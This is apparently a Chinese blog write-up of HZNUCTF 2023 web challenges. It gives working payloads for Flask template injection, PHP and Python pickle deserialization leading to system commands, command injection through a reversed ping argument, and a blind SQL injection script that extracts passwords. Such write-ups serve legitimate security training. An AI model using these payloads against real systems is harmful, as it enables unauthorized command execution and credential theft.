[HZNUCTF 2023]
|
NSSCTF,赛题复现
|
546

511 字
|
15 分钟
本文最后更新于395 天前,其中的信息可能已经过时,如有错误请发送邮件到1714510997@qq.com

flask

name传上去的参数会被翻转,我们找个在线的工具即可,用脚本也行

while True:
    str = input('请输入倒序字符串:')
    print(str[::-1])

先看看根目录下的文件

{{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls /').read()")}}

发现了flag.sh文件和start.sh文件,查看文件也没有发现flag,这两个文件的内容都和环境变量有关,那我们看一下环境变量

{{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('env').read()")}}

成功拿到flag

ppppop

打开环境是空白的页面,抓包看看

我们发现Cookie这里被base64加密过,内容和admin有关,那我们修改一下,把数字0改为1,重新发包

简单的反序列化

payload:

<?php
error_reporting(0);
include('utils.php');

class A {
    public $className;
    public $funcName;
    public $args;

    public function __destruct() {
        $class = new $this->className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}

class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}


$a = new A;
$a->className = "B";
$a->funcName = "system";
$a->args = "env";

echo base64_encode(strrev(serialize($a)));

和上一题一样,还是在env里面找到flag

guessguessguess

看似SQL注入,实则命令执行(苦茶子都被骗掉了

输入hint他会提示我们这是个命令执行

源码:

<?php
  $userArr = array("username: admin<br>password: admin","username: docker<br>password: docker", "username: mxx307<br>password: mxxxxxxx3333000777", "username: FLAG_IN_HERE<br>password: 不给你看");

$cmd = strrev($_POST['cmd']);
if($cmd != 'hint' && $cmd != 'phpinfo'){
  echo "your SQL: SELECT * FROM users WHERE id=$cmd";
  echo "<br>";
}
if($cmd == "phpinfo") {
  eval('phpinfo();');
} else if(preg_match('/127.0.0.1/',$cmd) && !preg_match('/;|&/',$cmd )) {
  system('ping '.$cmd);
} else if($cmd == "hint") {
  echo '可爱的CTFer哟,你掉的是这个金"命令执行",还是这个银"XSS"还是这个普通的"SQL注入"呢?';
}else if(preg_match('/^\d$/',$cmd, $matches)) {
  if($matches[0] <= 4 && $matches[0] >= 1){
    echo $userArr[$matches[0] - 1];
  } else {
    echo "no user";
  }
}else {
  echo "猜猜猜";
}

payload:

cmd=vne|1.0.0.721

ezlogin

sql注入的题目

我们查看源码会看到给我们的提示

<!--
$username = strrev(base64_decode($_POST['username']));
$username = preg_replace('/select|union|and|database/', "hznuctf2023", $username);-->

实际上在注入的过程中,他还过滤了空格和=号

payload:

import base64
import requests

url = 'http://node2.anna.nssctf.cn:28221/'
flag = ''
# pay = "1'/**/or/**/ascii(substr((SELECT/**/group_concat(schema_name)/**/from/**/information_schema.schemata)," \
#       "{},1))>{}#"
pay = "1'/**/or/**/ascii(substr((SELECT/**/group_concat(password)/**/from/**/user)," \
        "{},1))>{}#"
for i in range(34, 100):
    left = 32
    right = 126
    mid = (left + right) // 2
    while left < right:
        payload = pay.format(i, mid)
        # print(base64.b64encode(payload[::-1].encode()))
        data = {'username': base64.b64encode(payload[::-1].encode()), 'passwd': '1'}
        r = requests.post(url=url, data=data)

        if 'success' in r.text:
            left = mid + 1
        else:
            right = mid
        mid = (left + right) // 2
    flag += chr(mid)
    print(flag)
    if "}" in flag:
        break

pickle

python反序列化


import base64
import pickle
from flask import Flask, request

app = Flask(__name__)


@app.route('/')
def index():
    with open('app.py', 'r') as f:
        return f.read()


@app.route('/calc', methods=['GET'])
def getFlag():
    payload = request.args.get("payload")
    pickle.loads(base64.b64decode(payload).replace(b'os', b''))
    return "ganbadie!"


@app.route('/readFile', methods=['GET'])
def readFile():
    filename = request.args.get('filename').replace("flag", "????")
    with open(filename, 'r') as f:
        return f.read()


if __name__ == '__main__':
    app.run(host='0.0.0.0')

页面无回显,不出网,只能通过/calc传入参数反序列化,如果我们序列化的是一条命令,将命令执行的结果写入文件,再通过/readFile路由来读取命令,那么我们就能得到flag

我们可以用字符串拼接绕过过滤

import pickle
import base64
 
class A():
    def __reduce__(self):
        return (eval,("__import__('o'+'s').system('env | tee a')",))
 
a = A()
b = pickle.dumps(a)
print(base64.b64encode(b))

Web安全赛题复现
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																

							
							
						

																

							
							
						

										
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
BRICSCTF

							
							

							
CTFShow-元旦水友赛-Web

							
							

							
ASISCTF

							
							

							
2024CISCN ezjava

							
							

							
[GDOUCTF 2023]

							
							

							
Web入门

							
							

							
NewStartCTF2023

							
							

							
赛事题

							
							

							
NSSCTF

							
							

							
极限命令执行